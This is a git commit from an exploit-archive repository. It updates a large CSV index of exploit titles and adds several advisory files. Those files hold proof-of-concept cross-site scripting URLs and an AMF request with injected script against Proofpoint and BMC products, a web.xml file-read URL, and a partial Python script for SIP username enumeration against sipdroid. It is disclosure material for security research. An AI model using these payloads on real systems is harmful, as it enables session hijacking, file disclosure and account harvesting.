Update: 2015-01-07

13 new exploits
This commit is contained in:
Offensive Security 2015-01-07 08:36:08 +00:00
parent 14036ab825
commit c263b4d439
14 changed files with 473 additions and 16 deletions

View file

@ -8098,7 +8098,7 @@ id,file,description,date,author,platform,type,port
8592,platforms/windows/local/8592.pl,"Beatport Player 1.0.0.283 - (.M3U) Local Stack Overflow Exploit (3)",2009-05-01,Stack,windows,local,0
8593,platforms/php/webapps/8593.txt,"pecio CMS 1.1.5 (index.php language) Local File Inclusion Vulnerability",2009-05-01,SirGod,php,webapps,0
8594,platforms/windows/local/8594.pl,"RM Downloader - (.smi ) Universal Local Buffer Overflow Exploit",2009-05-01,Stack,windows,local,0
8595,platforms/windows/local/8595.txt,"Adobe Acrobat Reader 8.1.2 9.0 - getIcon() Memory Corruption Exploit",2009-05-04,Abysssec,windows,local,0
8595,platforms/windows/local/8595.txt,"Adobe Acrobat Reader 8.1.2 - 9.0 - getIcon() Memory Corruption Exploit",2009-05-04,Abysssec,windows,local,0
8596,platforms/asp/webapps/8596.pl,"Winn ASP Guestbook 1.01b Remote Database Disclosure Exploit",2009-05-04,ZoRLu,asp,webapps,0
8597,platforms/solaris/dos/8597.c,"Solaris 10 / OpenSolaris (dtrace) Local Kernel Denial of Service PoC",2009-05-04,mu-b,solaris,dos,0
8598,platforms/solaris/dos/8598.c,"Solaris 10 / OpenSolaris (fasttrap) Local Kernel Denial of Service PoC",2009-05-04,mu-b,solaris,dos,0
@ -10011,7 +10011,7 @@ id,file,description,date,author,platform,type,port
10820,platforms/php/dos/10820.sh,"Joomla Core <= 1.5.x com_component - DoS (0day)",2009-12-31,emgent,php,dos,80
10821,platforms/multiple/webapps/10821.txt,"WingFTP Server 3.2.4 - CSRF Vulnerability",2009-12-30,Ams,multiple,webapps,0
10822,platforms/php/webapps/10822.txt,"Joomla Component com_rd_download Local File Disclosure Vulnerability",2009-12-30,FL0RiX,php,webapps,0
10823,platforms/asp/webapps/10823.txt,"UranyumSoft Ýlan Servisi Database Disclosure Vulnerability",2009-12-30,LionTurk,asp,webapps,0
10823,platforms/asp/webapps/10823.txt,"UranyumSoft Ýlan Servisi - Database Disclosure Vulnerability",2009-12-30,LionTurk,asp,webapps,0
10824,platforms/php/webapps/10824.txt,"K-Rate SQL Injection Vulnerability",2009-12-30,e.wiZz,php,webapps,0
10825,platforms/php/dos/10825.sh,"Wordpress <= 2.9 - DoS (0day)",2009-12-31,emgent,php,dos,80
10826,platforms/php/dos/10826.sh,"Drupal <= 6.16 and 5.21 - DoS (0day)",2009-12-31,emgent,php,dos,80
@ -10885,7 +10885,7 @@ id,file,description,date,author,platform,type,port
11930,platforms/windows/dos/11930.pl,"ASX to MP3 Converter 3.0.0.100 - Local Stack Overflow PoC",2010-03-29,mat,windows,dos,0
11931,platforms/asp/webapps/11931.txt,"Asp - comersus7F Shopping Cart Software Backup Dump Vulnerability",2010-03-29,indoushka,asp,webapps,0
11932,platforms/linux/dos/11932.txt,"xwine 1.0.1 - (.exe) Local Crash PoC Exploit",2010-03-29,JosS,linux,dos,0
11934,platforms/php/webapps/11934.txt,"Powie's PSCRIPT Gästebuch <= 2.09 SQL Injection Vulnerability",2010-03-29,"Easy Laster",php,webapps,0
11934,platforms/php/webapps/11934.txt,"Powie's PSCRIPT Gästebuch <= 2.09 - SQL Injection Vulnerability",2010-03-29,"Easy Laster",php,webapps,0
11935,platforms/php/webapps/11935.txt,"Joomla Component com_guide SQL Injection Vulnerability",2010-03-30,"DevilZ TM",php,webapps,0
11938,platforms/php/webapps/11938.txt,"Pepsi CMS (Irmin cms) pepsi-0.6-BETA2 - Multiple Local File Vulnerability",2010-03-30,eidelweiss,php,webapps,0
11939,platforms/php/webapps/11939.txt,"Joomla Component com_spec SQL Injection Vulnerability",2010-03-29,"DevilZ TM",php,webapps,0
@ -10961,7 +10961,7 @@ id,file,description,date,author,platform,type,port
12022,platforms/php/webapps/12022.txt,"68kb Knowledge Base 1.0.0rc3 - Edit Main Settings CSRF",2010-04-02,"Jelmer de Hen",php,webapps,0
12024,platforms/windows/local/12024.php,"Zip Unzip 6.0 - (.zip) 0day Stack Buffer Overflow PoC Exploit",2010-04-03,mr_me,windows,local,0
12025,platforms/windows/dos/12025.php,"Dualis 20.4 - (.bin) Local Daniel Of Service",2010-04-03,"Yakir Wizman",windows,dos,0
12026,platforms/php/webapps/12026.txt,"phpscripte24 Vor und Rückwärts Auktions System Blind SQL Injection Vulnerability",2010-04-03,"Easy Laster",php,webapps,0
12026,platforms/php/webapps/12026.txt,"phpscripte24 Vor und Rückwärts Auktions System - Blind SQL Injection Vulnerability",2010-04-03,"Easy Laster",php,webapps,0
12027,platforms/windows/dos/12027.py,"DSEmu 0.4.10 - (.nds) Local Crash Exploit",2010-04-03,l3D,windows,dos,0
12028,platforms/php/webapps/12028.txt,"PHP-fusion dsmsf (module downloads) SQL Injection Exploit",2010-04-03,Inj3ct0r,php,webapps,0
12029,platforms/asp/webapps/12029.txt,"SafeSHOP <= 1.5.6 - Cross-Site Scripting & Multiple Cross-Site Request Forgery",2010-04-03,"cp77fk4r ",asp,webapps,0
@ -11417,7 +11417,7 @@ id,file,description,date,author,platform,type,port
12532,platforms/php/webapps/12532.txt,"B2B Classic Trading Script (offers.php) SQL Injection Vulnerability",2010-05-08,v3n0m,php,webapps,0
12533,platforms/php/webapps/12533.txt,"big.asp - SQL Injection Vulnerability",2010-05-08,Ra3cH,php,webapps,0
12534,platforms/php/webapps/12534.txt,"PHP Link Manager 1.7 - Url Redirection Bug",2010-05-08,ITSecTeam,php,webapps,0
12535,platforms/php/webapps/12535.txt,"phpscripte24 Countdown Standart Rückwärts Auktions System SQL Injection",2010-05-08,"Easy Laster",php,webapps,0
12535,platforms/php/webapps/12535.txt,"phpscripte24 Countdown Standart Rückwärts Auktions System - SQL Injection",2010-05-08,"Easy Laster",php,webapps,0
12539,platforms/php/webapps/12539.txt,"Joomla Component com_articleman Upload Vulnerability",2010-05-08,Sid3^effects,php,webapps,0
12540,platforms/windows/local/12540.rb,"IDEAL Migration 4.5.1 - Buffer Overflow Exploit (Meta)",2010-05-08,blake,windows,local,0
12541,platforms/windows/dos/12541.php,"Dolphin 2.0 - (.elf) Local Daniel Of Service",2010-05-09,"Yakir Wizman",windows,dos,0
@ -12951,7 +12951,7 @@ id,file,description,date,author,platform,type,port
14849,platforms/php/webapps/14849.py,"mBlogger 1.0.04 (viewpost.php) - SQL Injection Exploit",2010-08-31,"Ptrace Security",php,webapps,0
14851,platforms/php/webapps/14851.txt,"dompdf 0.6.0 beta1 - Remote File Inclusion Vulnerability",2010-09-01,Andre_Corleone,php,webapps,0
14852,platforms/windows/dos/14852.txt,"leadtools activex common dialogs 16.5 - Multiple Vulnerabilities",2010-09-01,LiquidWorm,windows,dos,0
14853,platforms/windows/remote/14853.py,"Adobe Acrobat Reader and Flash Player - “newclass” invalid pointer",2010-09-01,Abysssec,windows,remote,0
14853,platforms/windows/remote/14853.py,"Adobe Acrobat Reader and Flash Player - ""newclass"" invalid pointer",2010-09-01,Abysssec,windows,remote,0
14854,platforms/php/webapps/14854.py,"Cpanel PHP - Restriction Bypass Vulnerability (0day)",2010-09-01,Abysssec,php,webapps,0
14856,platforms/windows/remote/14856.txt,"TFTPDWIN 0.4.2 - Directory Traversal Vulnerability",2010-09-01,chr1x,windows,remote,0
14857,platforms/windows/remote/14857.txt,"tftp desktop 2.5 - Directory Traversal Vulnerability",2010-09-01,chr1x,windows,remote,0
@ -13251,7 +13251,7 @@ id,file,description,date,author,platform,type,port
15284,platforms/php/webapps/15284.txt,"phpCheckZ 1.1.0 - Blind SQL Injection Vulnerability",2010-10-19,"Salvatore Fresta",php,webapps,0
15285,platforms/linux/local/15285.c,"Linux Kernel <= 2.6.36-rc8 - RDS Protocol Local Privilege Escalation",2010-10-19,"Dan Rosenberg",linux,local,0
15287,platforms/windows/local/15287.py,"Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit",2010-10-19,Mighty-D,windows,local,0
15288,platforms/windows/remote/15288.txt,"Oracle JRE - java.net.URLConnection class Same-of-Origin (SOP) Policy Bypass",2010-10-20,"Roberto Suggi Liverani",windows,remote,0
15288,platforms/windows/remote/15288.txt,"Oracle JRE - java.net.URLConnection class - Same-of-Origin (SOP) Policy Bypass",2010-10-20,"Roberto Suggi Liverani",windows,remote,0
15290,platforms/jsp/webapps/15290.txt,"Oracle Sun Java System Web Server - HTTP Response Splitting",2010-10-20,"Roberto Suggi Liverani",jsp,webapps,0
15292,platforms/windows/remote/15292.rb,"ASP.NET Auto-Decryptor File Download Exploit (MS10-070)",2010-10-20,"Agustin Azubel",windows,remote,0
15293,platforms/linux/dos/15293.txt,"LibSMI smiGetNode Buffer Overflow When Long OID Is Given In Numerical Form",2010-10-20,"Core Security",linux,dos,0
@ -14891,7 +14891,7 @@ id,file,description,date,author,platform,type,port
17151,platforms/windows/remote/17151.rb,"IBM Lotus Domino iCalendar MAILTO Buffer Overflow",2011-04-04,metasploit,windows,remote,25
17152,platforms/windows/remote/17152.rb,"ManageEngine Applications Manager Authenticated Code Execution",2011-04-08,metasploit,windows,remote,9090
17153,platforms/windows/local/17153.rb,"VeryTools Video Spirit Pro <= 1.70 - (.visprj) Buffer Overflow",2011-04-11,metasploit,windows,local,0
17155,platforms/windows/remote/17155.py,"Cisco Security Agent Management Console st_upload RCE Exploit",2011-04-12,"Gerry Eisenhaur",windows,remote,0
17155,platforms/windows/remote/17155.py,"Cisco Security Agent Management Console - 'st_upload' RCE Exploit",2011-04-12,"Gerry Eisenhaur",windows,remote,0
17156,platforms/windows/remote/17156.txt,"OpenText FirstClass Client 11.005 - Code Execution",2011-04-12,"Kyle Ossinger",windows,remote,0
17157,platforms/windows/local/17157.py,"Wordtrainer 3.0 - (.ord) Buffer Overflow Vulnerability",2011-04-12,"C4SS!0 G0M3S",windows,local,0
17158,platforms/windows/local/17158.txt,"Microsoft HTML Help <= 6.1 - Stack Overflow",2011-04-12,"Luigi Auriemma",windows,local,0
@ -18145,7 +18145,7 @@ id,file,description,date,author,platform,type,port
20873,platforms/php/webapps/20873.html,"RV Article Publisher CSRF Vulnerability",2012-08-28,DaOne,php,webapps,0
20874,platforms/php/webapps/20874.html,"RV Shopping Cart CSRF Vulnerability",2012-08-28,DaOne,php,webapps,0
20876,platforms/windows/remote/20876.pl,"Simple Web Server 2.2-rc2 ASLR Bypass Exploit",2012-08-28,pole,windows,remote,0
20877,platforms/hardware/webapps/20877.txt,"Conceptronic GrabnGo and Sitecom Storage Center Password Disclosure",2012-08-28,"Mattijs van Ommeren",hardware,webapps,0
20877,platforms/hardware/webapps/20877.txt,"Conceptronic Grab'n'Go and Sitecom Storage Center Password Disclosure",2012-08-28,"Mattijs van Ommeren",hardware,webapps,0
20878,platforms/cgi/remote/20878.txt,"mimanet source viewer 2.0 - Directory Traversal Vulnerability",2001-05-23,joetesta,cgi,remote,0
20879,platforms/unix/remote/20879.txt,"OpenServer 5.0.5/5.0.6,HP-UX 10/11,Solaris 2.6/7.0/8 rpc.yppasswdd Buffer Overrun",2001-05-10,metaray,unix,remote,0
20880,platforms/windows/local/20880.c,"Microsoft Windows 2000 - Debug Registers Vulnerability",2001-05-24,"Georgi Guninski",windows,local,0
@ -18293,7 +18293,7 @@ id,file,description,date,author,platform,type,port
21028,platforms/hardware/dos/21028.pl,"Cisco IOS 12 UDP Denial of Service Vulnerability",2001-07-25,blackangels,hardware,dos,0
21029,platforms/multiple/remote/21029.pl,"Softek MailMarshal 4,Trend Micro ScanMail 1.0 SMTP Attachment Protection Bypass",2001-07-25,"Aidan O'Kelly",multiple,remote,0
21030,platforms/windows/remote/21030.txt,"Snapstream Personal Video Station 1.2 a PVS Directory Traversal Vulnerability",2001-07-26,john@interrorem.com,windows,remote,0
21032,platforms/hardware/webapps/21032.txt,"Conceptronic GrabnGo Network Storage Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps,0
21032,platforms/hardware/webapps/21032.txt,"Conceptronic Grab'n'Go Network Storage Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps,0
21033,platforms/hardware/webapps/21033.txt,"Sitecom Home Storage Center Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps,0
21034,platforms/windows/remote/21034.rb,"SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow",2012-09-07,metasploit,windows,remote,3200
21035,platforms/windows/remote/21035.txt,"Snapstream PVS 1.2 Plaintext Password Vulnerability",2001-07-26,John,windows,remote,0
@ -26230,7 +26230,7 @@ id,file,description,date,author,platform,type,port
29263,platforms/windows/local/29263.pl,"BlazeDVD 6.2 - (.plf) Buffer Overflow (SEH)",2013-10-28,"Mike Czumak",windows,local,0
29264,platforms/php/webapps/29264.txt,"Onpub CMS 1.4 & 1.5 - Multiple SQL Injection Vulnerabilities",2013-10-28,Vulnerability-Lab,php,webapps,0
29265,platforms/php/webapps/29265.txt,"ILIAS eLearning CMS 4.3.4 & 4.4 - Persistent XSS",2013-10-29,Vulnerability-Lab,php,webapps,0
29266,platforms/hardware/webapps/29266.txt,"Stem Innovation IZON Hard-coded Credentials",2013-10-29,"Mark Stanislav",hardware,webapps,0
29266,platforms/hardware/webapps/29266.txt,"Stem Innovation 'IZON' Hard-coded Credentials",2013-10-29,"Mark Stanislav",hardware,webapps,0
29267,platforms/php/webapps/29267.txt,"ProNews 1.5 admin/change.php Multiple Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0
29268,platforms/php/webapps/29268.txt,"ProNews 1.5 lire-avis.php aa Parameter SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0
29269,platforms/php/webapps/29269.txt,"ProNews 1.5 lire-avis.php aa Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0
@ -27066,7 +27066,7 @@ id,file,description,date,author,platform,type,port
30162,platforms/php/webapps/30162.txt,"WMSCMS 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-07,"Glafkos Charalambous ",php,webapps,0
30163,platforms/multiple/dos/30163.html,"Blue Coat Systems K9 Web Protection 32.36 - Remote Buffer Overflow Vulnerability",2007-06-08,"Dennis Rand",multiple,dos,0
30164,platforms/hardware/remote/30164.txt,"3Com OfficeConnect Secure Router 1.04-168 Tk Parameter Cross-Site Scripting Vulnerability",2007-06-08,"Secunia Research",hardware,remote,0
30165,platforms/asp/webapps/30165.txt,"Ibrahim Ã?AKICI Okul Portal 2.0 Haber_Oku.ASP SQL Injection Vulnerability",2007-06-08,ertuqrul,asp,webapps,0
30165,platforms/asp/webapps/30165.txt,"Ibrahim Ã?AKICI Okul Portal 2.0 - Haber_Oku.ASP SQL Injection Vulnerability",2007-06-08,ertuqrul,asp,webapps,0
30166,platforms/php/webapps/30166.txt,"WordPress 2.2 Request_URI Parameter Cross-Site Scripting Vulnerability",2007-06-08,zamolx3,php,webapps,0
30167,platforms/hardware/dos/30167.txt,"Packeteer PacketShaper 7.x Web Interface Remote Denial of Service Vulnerability",2007-06-08,nnposter,hardware,dos,0
30168,platforms/php/webapps/30168.txt,"vBSupport 2.0.0 Integrated Ticket System vBSupport.PHP SQL Injection Vulnerability",2007-06-09,rUnViRuS,php,webapps,0
@ -27383,8 +27383,8 @@ id,file,description,date,author,platform,type,port
30546,platforms/windows/local/30546.txt,"Multiple MicroWorld eScan Products Local Privilege Escalation Vulnerability",2007-08-30,"Edi Strosar",windows,local,0
30547,platforms/hardware/webapps/30547.txt,"D-Link DSL-2750U ME_1.09 - CSRF Vulnerability",2013-12-28,"FIGHTERx war",hardware,webapps,0
30550,platforms/windows/dos/30550.php,"Ofilter Player 1.1 - (.wav) Integer Division by Zero",2013-12-28,"Osanda Malith",windows,dos,0
30553,platforms/php/webapps/30553.txt,"Toms Gästebuch 1.00 form.php Multiple Parameter XSS",2007-09-07,cod3in,php,webapps,0
30554,platforms/php/webapps/30554.txt,"Toms Gästebuch 1.00 admin/header.php Multiple Parameter XSS",2007-09-07,cod3in,php,webapps,0
30553,platforms/php/webapps/30553.txt,"Toms Gästebuch 1.00 - form.php Multiple Parameter XSS",2007-09-07,cod3in,php,webapps,0
30554,platforms/php/webapps/30554.txt,"Toms Gästebuch 1.00 - admin/header.php Multiple Parameter XSS",2007-09-07,cod3in,php,webapps,0
30555,platforms/php/webapps/30555.txt,"MKPortal 1.0/1.1 Admin.PHP Authentication Bypass Vulnerability",2007-09-03,Demential,php,webapps,0
30556,platforms/php/webapps/30556.html,"Claroline 1.x inc/lib/language.lib.php language Parameter Traversal Local File Inclusion",2007-09-03,"Fernando Munoz",php,webapps,0
30557,platforms/php/webapps/30557.txt,"Claroline 1.x admin/adminusers.php dir Parameter XSS",2007-09-03,"Fernando Munoz",php,webapps,0
@ -27887,7 +27887,7 @@ id,file,description,date,author,platform,type,port
31077,platforms/php/webapps/31077.txt,"Mambo/Joomla 'com_buslicense' Component - 'aid' Parameter SQL Injection Vulnerability",2008-01-30,S@BUN,php,webapps,0
31078,platforms/hardware/remote/31078.txt,"2Wire Routers 'H04_POST' - Access Validation Vulnerability",2008-01-30,"Oligarchy Oligarchy",hardware,remote,0
31079,platforms/php/webapps/31079.txt,"webSPELL 4.1.2 - 'whoisonline.php' Cross-Site Scripting Vulnerability",2008-01-30,NBBN,php,webapps,0
31080,platforms/php/webapps/31080.txt,"YeSiL KoRiDoR Ziyaretçi Defteri 'index.php' SQL Injection Vulnerability",2008-01-30,ShaFuck31,php,webapps,0
31080,platforms/php/webapps/31080.txt,"YeSiL KoRiDoR Ziyaretçi Defteri - 'index.php' SQL Injection Vulnerability",2008-01-30,ShaFuck31,php,webapps,0
31081,platforms/cgi/webapps/31081.txt,"OpenBSD 4.1 bgplg 'cmd' Parameter Cross-Site Scripting Vulnerability",2007-10-10,"Anton Karpov",cgi,webapps,0
31082,platforms/php/webapps/31082.txt,"Liferay Enterprise Portal 4.3.6 User-Agent HTTP Header Cross-Site Scripting Vulnerability",2008-01-31,"Tomasz Kuczynski",php,webapps,0
31083,platforms/php/webapps/31083.txt,"Nilson's Blogger 0.11 - 'comments.php' Local File Include Vulnerability",2008-01-31,muuratsalo,php,webapps,0
@ -31337,7 +31337,7 @@ id,file,description,date,author,platform,type,port
34795,platforms/php/webapps/34795.txt,"WebAsyst Shop-Script 'index.php' Cross-Site Scripting Vulnerability",2009-07-09,Vrs-hCk,php,webapps,0
34796,platforms/multiple/remote/34796.txt,"Oracle MySQL < 5.1.50 - Privilege Escalation Vulnerability",2010-08-03,"Libing Song",multiple,remote,0
34797,platforms/php/webapps/34797.txt,"SurgeMail SurgeWeb 4.3e Cross-Site Scripting Vulnerability",2010-10-04,"Kerem Kocaer",php,webapps,0
34798,platforms/php/webapps/34798.txt,"ITS SCADA Username SQL Injection Vulnerability²",2010-10-04,"Eugene Salov",php,webapps,0
34798,platforms/php/webapps/34798.txt,"ITS SCADA Username - SQL Injection Vulnerability",2010-10-04,"Eugene Salov",php,webapps,0
34800,platforms/php/webapps/34800.txt,"Typo3 JobControl 2.14.0 - Cross-Site Scripting / SQL Injection",2014-09-27,"Adler Freiheit",php,webapps,0
34802,platforms/hardware/remote/34802.html,"Research In Motion BlackBerry Device Software <= 4.7.1 - Cross Domain Information Disclosure Vulnerability",2010-10-04,"599eme Man",hardware,remote,0
34803,platforms/php/webapps/34803.txt,"Online Guestbook Pro 5.1 - 'ogp_show.php' Cross-Site Scripting Vulnerability",2009-07-09,Moudi,php,webapps,0
@ -32155,3 +32155,16 @@ id,file,description,date,author,platform,type,port
35686,platforms/windows/remote/35686.pl,"OpenMyZip 0.1 - (.zip) File Buffer Overflow Vulnerability",2011-05-02,"C4SS!0 G0M3S",windows,remote,0
35688,platforms/hardware/remote/35688.py,"ASUSWRT 3.0.0.4.376_1071 - LAN Backdoor Command Execution",2015-01-04,"Friedrich Postelstorfer",hardware,remote,0
35691,platforms/php/webapps/35691.txt,"Crea8Social 2.0 - XSS Change Interface",2015-01-04,"Yudhistira B W",php,webapps,0
35697,platforms/php/webapps/35697.txt,"Web Auction 0.3.6 'lang' Parameter Cross Site Scripting Vulnerability",2011-05-03,"AutoSec Tools",php,webapps,0
35698,platforms/cgi/webapps/35698.txt,"Proofpoint Protection Server 5.5.5 'process.cgi' Cross Site Scripting Vulnerability",2011-05-03,"Karan Khosla",cgi,webapps,0
35699,platforms/php/webapps/35699.txt,"E2 Photo Gallery 0.9 'index.php' Cross Site Scripting Vulnerability",2011-05-03,"High-Tech Bridge SA",php,webapps,0
35700,platforms/php/webapps/35700.txt,"YaPIG 0.95 Multiple Cross Site Scripting Vulnerabilities",2011-05-03,"High-Tech Bridge SA",php,webapps,0
35701,platforms/php/webapps/35701.txt,"SelectaPix 1.4.1 'uploadername' Parameter Cross Site Scripting Vulnerability",2011-05-03,"High-Tech Bridge SA",php,webapps,0
35702,platforms/php/webapps/35702.txt,"Multiple GoT.MY Products 'theme_dir' Parameter Cross Site Scripting Vulnerability",2011-05-03,Hector.x90,php,webapps,0
35703,platforms/multiple/remote/35703.py,"sipdroid <= 2.2 SIP INVITE Response User Enumeration Weakness",2011-05-04,"Anibal Vaz Marques",multiple,remote,0
35704,platforms/php/webapps/35704.txt,"WP Ajax Calendar 1.0 'example.php' Cross Site Scripting Vulnerability",2011-05-05,"High-Tech Bridge SA",php,webapps,0
35705,platforms/php/webapps/35705.txt,"PHP Directory Listing Script 3.1 'index.php' Cross Site Scripting Vulnerability",2011-05-05,"High-Tech Bridge SA",php,webapps,0
35706,platforms/jsp/webapps/35706.txt,"BMC Remedy Knowledge Management 7.5.00 Default Account and Multiple Cross Site Scripting Vulnerabilities",2011-05-05,"Richard Brain",jsp,webapps,0
35707,platforms/jsp/webapps/35707.txt,"BMC Dashboards 7.6.01 Cross Site Scripting and Information Disclosure Vulnerabilities",2011-05-05,"Richard Brain",jsp,webapps,0
35708,platforms/php/webapps/35708.txt,"PHPDug 2.0 Multiple Cross Site Scripting Vulnerabilities",2011-05-05,"High-Tech Bridge SA",php,webapps,0
35709,platforms/php/webapps/35709.txt,"e107 0.7.25 'news.php' SQL Injection Vulnerability",2011-05-07,KedAns-Dz,php,webapps,0

Can't render this file because it is too large.

15
platforms/cgi/webapps/35698.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/47687/info
Proofpoint Protection Server is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Proofpoint Protection Server 5.5.5 is vulnerable; other versions may also be affected.
http://www.example.com:10020/enduser/process.cgi?cmd=release&;
recipient=xxx () yyy com au&
msg_id=%28MDYzMjU0NTJkYTQ0OWRhYjJlNWY1MjBhNzc5MDEwODlkZGY5OGIzMTc1MGI=%29&
locale=enus&x=580&y=470&displayprogress=t%22%20
onmouseover=%22alert%281%29%22%20name=%22frame_display%22%20id=%22
frame_display%22%20NORESIZE%20SCROLLING=%22no%22%20/%3E%3C!--

16
platforms/jsp/webapps/35706.txt Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/47728/info
BMC Remedy Knowledge Management is prone to a default-account vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Attackers can leverage the default account issue to bypass authentication and gain access without permission. Successful exploits can aid in further attacks.
An attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Remedy Knowledge Management 7.5.00 is vulnerable; other versions may also be affected.
https://www.example.com/rkm/external.jsp?doc=&#039;%3balert(1)//&user=Self+Help
https://www.example.com/rkm/search.jsp?user=Self+Help&startDate=\&#039;%3balert(1)//
https://www.example.com/rkm/usersettings.jsp?"><script>alert(1)</script>
https://www.example.com/rkm/viewdoc.jsp?doc=><script>alert(1)</script>&user=Self%20Help
https://www.example.com/rkm/AttachmentServlet?="><script>alert(1)</script>
https://www.example.com/rkm/index.jsp?user=Self%20Help

73
platforms/jsp/webapps/35707.txt Executable file
View file

@ -0,0 +1,73 @@
source: http://www.securityfocus.com/bid/47731/info
BMC Dashboards is prone to to multiple information-disclosure and cross-site scripting issues because the application fails to properly sanitize user-supplied input.
A remote attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Exploiting the information-disclosure issues allows the attacker to view local files within the context of the webserver process.
a)
https://www.example.com/bmc_help2u/help_services/html/xx/<script>alert(1)</script>404.htm
b)
https://www.example.com/bmc_help2u/servlet/helpServlet2u?textareaWrap=/bmc_help2u/help_services/demos/frameTst/my0a.jsp&msg="><script>alert(1)</script>
c) multiple XSS within demo pages
https:/www.example.com/help_services/demos/helpTest.jsp?help='><script>alert(1)</script>
https://www.example.com/bmc_help2u/help_services/demos/setChromeDef.jsp?bFlag=<script>alert(1)</script>&submitVals=Call+setChromeDefBoolean
d) Multiple XSS as the AMF stream is unfiltered
POST /bsmdashboards/messagebroker/amfsecure HTTP/1.1
Content-Type: application/x-amf
Host: target-domain.foo
Content-Length: 462
........null../58..... ..
.COflex.messaging.messages.RemotingMessage.timestamp.headers.operation
bodysource.remotePassword.remoteUsername.parameters.messageId.timeToLive.clientId.destination.........
#.
DSId.DSEndpoint.IFDCEEFC2-F318-1B37-7F3A-B438E60525E0..bsd-secure-amf...getUndefinedDataSources<script>alert(1)</script>
..
.qcom.bmc.bsm.dashboards.services.facade.RequestParameters.
#. name.version..208Archive..1.0...
.Cflex.messaging.io.ArrayCollection ..
..I3DDF906B-55F2-5E38-38C1-6A08D1AC077B..........IFDDDB883-6F0C-D935-5E7B-25CDF25C3538.-dashboardArchiveFacade
results:-
HTTP/1.1 200 OK
Date: Sat, 02 Oct 2010 00:15:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: application/x-amf
Content-Length: 4651
......../58/onStatus.......
.SIflex.messaging.messages.ErrorMessage.headers.rootCause
body.correlationId.faultDetail.faultString.clientId.timeToLive.destination.timestamp.extendedData.faultCode.messageId
..
..acom.bmc.bsm.dashboards.util.logging.BSDException.message
guid!localizedMessage.cause.arguments.priority.traceback.errorCode.causeSummary.System
error. Contact your system administrator for assistance.
.Kcom.bmc.bsm.dashboards.util.guid.Guid!uniqueIdentifier.AdZZZZZZZZJIiCvq53w9q0gerq4j8y0oq.0
.s?flex.messaging.MessageException.errorMessage."$)logStackTraceEnablednumber
codelogged.statusCode..-defaultLogMessageIntro.details#preferredLogLevel+rootCauseErrorMessage
.
......)Method 'getUndefinedDataSources<script>alert(1)</script>' not
found...1Cannot invoke method 'getUndefinedDataSourcesfdd4d
Consequences:
An attacker may be able to cause execution of malicious scripting code
in the browser of a user who clicks on a link to Remedy Knowledge
Management based site. Such code would run within the security context
of the target domain. This type of attack can result in non-persistent
defacement of the target site, or the redirection of confidential
information (i.e.: session IDs) to unauthorised third parties. No
authentication is required to exploit this vulnerability.
2) Application is vulnerable to file source code reading limited to the
web-root.
https://www.example.com/bmc_help2u/servlet/helpServlet2u?textareaWrap=/bmc_help2u/WEB-INF/web.xml

View file

@ -0,0 +1,210 @@
source: http://www.securityfocus.com/bid/47710/info
sipdroid is prone to a user-enumeration weakness.
An attacker may leverage this issue to harvest valid usernames, which may aid in brute-force attacks.
sipdroid 1.6.1, 2.0.1, and 2.2 running on Android 2.1 are vulnerable; other versions may also be affected.
#!/usr/bin/env python
# Adapted from SipVicious by Anibal Aguiar - anibal.aguiar *SPAM*
tempest.com.br
#
# This code is only for security researches/teaching purposes,use at
your own risk!
import sys
import random
def printmsg(msg, color):
OKGREEN = '\033[92m'
OKBLUE = '\033[96m'
ENDC = '\033[0m'
WARN = '\033[91m'
if color is "Blue":
return OKBLUE + msg + ENDC
elif color is "Green":
return OKGREEN + msg + ENDC
elif color is "WARNING":
return WARN + msg + ENDC
def makeRequest(method,dspname,toaddr,
dsthost,port,callid,srchost='',
branchunique=None,localtag=None,
extension=None,body='',useragent=None,
cseq=1,auth=None,contact='<sip:123@1.1.1.1>',
accept='application/sdp',contentlength=None,
localport=5060,contenttype=None):
if extension is None:
uri = 'sip:%s' % dsthost
else:
uri = 'sip:%s@%s' % (extension,dsthost)
if branchunique is None:
branchunique = '%s' % random.getrandbits(32)
headers = dict()
finalheaders = dict()
superheaders = dict()
superheaders['Via'] = 'SIP/2.0/UDP %s:%s;branch=z9hG4bK%s;rport' %
(srchost,localport,branchunique)
headers['Max-Forwards'] = 70
headers['To'] = uri
headers['From'] = "\"%s\"" % dspname
if useragent is None:
headers['User-Agent'] = 'friendly-scanner'
headers['From'] += ';tag=as%s' % localtag
headers['Call-ID'] = "%s@%s" % (callid,srchost)
if contact is not None:
headers['Contact'] = contact
headers['CSeq'] = '%s %s' % (cseq,method)
headers['Max-Forwards'] = 70
headers['Accept'] = accept
if contentlength is None:
headers['Content-Length'] = len(body)
else:
headers['Content-Length'] = contentlength
if contenttype is None and len(body) > 0:
contenttype = 'application/sdp'
if contenttype is not None:
headers['Content-Type'] = contenttype
r = '%s %s SIP/2.0\r\n' % (method,uri)
for h in superheaders.iteritems():
r += '%s: %s\r\n' % h
for h in headers.iteritems():
r += '%s: %s\r\n' % h
for h in finalheaders.iteritems():
r += '%s: %s\r\n' % h
r += '\r\n'
r += body
return r, branchunique
----[SIPDroid-Extension_Enum.py]----------------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: Anibal Aguiar - anibal.aguiar *SPAM* tempest.com.br
#
# Dependences:
#
# optparse - The optparse library can be installed using the linux
repository
# of your distro.
#
